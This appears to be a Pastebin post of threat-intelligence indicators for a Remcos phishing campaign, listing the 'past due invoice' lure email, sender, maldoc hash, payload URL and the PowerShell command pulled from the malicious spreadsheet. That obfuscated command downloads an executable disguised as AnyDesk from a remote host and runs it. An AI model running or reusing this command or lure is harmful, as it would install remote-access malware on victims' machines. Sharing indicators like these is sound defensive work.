Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Remcos IOCs
- https://github.com/executemalware/Malware-IOCs/blob/main/2021-10-11%20Remcos%20IOCs
- THREAT IDENTIFICATION: REMCOS
- SUBJECTS OBSERVED
- PAST DUE INVOICE
- SENDERS OBSERVED
- sejongkj@daum.net
- EMAIL BODY
- Good afternoon,
- I need to confirm the following
- Attached find past due invoice details for your records,
- Kind regards,
- MALDOC FILE HASHES
- PAST DUE INVOICE.xls
- 092fd1fae341ede766b93f694c4ea0bf
- POWERSHELL FROM MALDOC
- C:\Users\analyst\Documents>powershell -w hi sleep -Se 31;Start-BitsTransfer -Sou
- rce htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination C:\Users\Pu
- blic\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe
- PAYLOAD URL
- http://thepunchlineexpose.com/Manager/AnyDesk.exe
- REMCOS C2
- No C2 traffic observed - the payload url was 404
- SUPPORTING EVIDENCE
- https://urlhaus.abuse.ch/browse.php?search=thepunchlineexpose.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement